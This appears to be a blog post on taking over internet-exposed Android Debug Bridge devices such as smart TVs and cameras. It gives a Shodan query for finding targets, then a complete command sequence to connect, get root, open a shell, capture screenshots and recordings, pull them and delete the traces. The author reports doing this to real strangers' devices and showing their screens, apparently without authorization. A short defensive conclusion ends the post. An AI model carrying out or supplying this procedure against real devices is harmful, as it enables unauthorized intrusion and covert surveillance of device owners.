Getting Shell Access to ADB Exposed Smart Devices 📲📺⌚

Exploiting Exposed ADB ports to get shell access to various smart devices such as smart tvs, cameras, etc.

Introduction

ADB is being used widely by android community developers to debug android apps and perform several other tasks such as to push/pull files between android & pc, install applications, enabling/disabling verity checks, execute commands, rooting device, etc.

I love CLI so I prefer using CLI commands over UI and ADB provides me shell access where I can run commands. It also has feature to expose TCP port allowing users to connect over LAN, but what if this local port is somehow exposed to the Internet allowing anyone to connect to the device via exposed adb port 5555 .

Since Android is an open source project, most of the companies create their custom version of android images which drive their products. There are high chances that smart device is running android or its variant, supporting ADB connection.

Can a malicious user connect to such exposed device??

Using Shodan To Find Exposed Devices

Finding devices using search

https://www.shodan.io/search?query=%22Android+Debug+Bridge%3A%22

Shodan Search

History of Devices with Exposed ADB port over the Internet

There are several devices connected to the Internet with exposed ADB port. Most of these devices are misconfigured allowing anyone to connect to these devices.

Installing ADB Tools For Connecting To A Remote Device

Install adb tools on debian based distro

$ sudo apt install android-tools-adb -y

Start server and connect to device

$ adb start-server

# adb connect [IP]:[PORT]
$ adb connect [TARGET_IP]:5555

# list devices
$ adb devices
List of devices attached
[redacted]:5555      device

Some devices don't accept connection. Try another IP if you're unable to connect to the device.

Getting Shell Access to device

I successfully got shell access to one of the exposed device.

Getting a shell access is one of the basic step for pivoting, attacker once gets shell access they usually try to privilege escalate the device then try to compromise other devices on the network. Attacker still can damage the system by uploading malicious/spyware application. As PoC I'll be capturing user's screen using shell access.

Let's try to find rooted devices on the Internet. Rooted devices provides complete control over the device to the attacker.

# connecting to target machine
$ adb connect [TARGET_IP]:5555

# enabling root on machine
$ adb -s [TARGET_IP]:5555 root

# getting root shell access to the device
$ adb -s [TARGET_IP]:5555 shell

Getting Root Access

Got Device with Root Access🎉

Capturing Screenshots and Recording Screen

Capturing Screenshot and Storing on Attacker's machine

$ adb -s [TARGET]:5555 exec-out screencap -p > screen.png

Image will be stored in current directory as screen.png

Capturing Screen and Pulling File on Local Machine

# capture screen for 10 seconds 
$ adb -s [device_ip]:5555 screenrecord  --time-limit 10 /sdcard/recorded.mp4

# download file
$ adb -s [device_ip]:5555 pull /sdcard/recorded.mp4

# delete file
$ adb -s [device_ip]:5555 shell rm /sdcard/recorded.mp4

Above commands will capture screen for 10s, download file to local machine in current working directory then delete file.

Using Above Commands and Capturing Screenshots

Screenshot capturing User 's Screen

User watching TV

Captured Screenshot of User Browsing Internet

Seems like Exposed Emulator

User Playing Game on Device

User Browsing Internet

Above images are captured from devices exposed to the Internet and using ADB to get access where user's are browsing web, watching shows, playing games, etc. But I encountered a ransomware infected machine asking victim for $100 to bitcoin address.

Encountered an Ransomware Infected Machine

Enlarged Image of Ransomware Infected device

Since, ADB port is exposed to the internet anyone can connect to the device over the internet and install ransomware application.

On searching for Nanoware Ransomware I couldn't find any traces of such ransomware over the internet. Though we cannot trust messages saying that "SORRY I have to feed my family", since it could be social engineering technique luring victim into paying low value ransom. But I think this attack isn't carried out by a ransomware gang but it should be an individual or it could be initial stage of the gang experimenting something.

Conclusion

There are several devices connected to the internet with their adb exposed to the internet allowing attacker to connect, execute commands, installing applications, capturing screen, etc. Among which most of the devices included Smart TVs, Smart TV boxes, Smart phones and Smart Cameras.

Users should close their adb connection after usage. Devices with adb port open shouldn't be exposed to internet, individuals should use VPN network such as wireguard/openvpn to create a secure network and connect to the device remotely.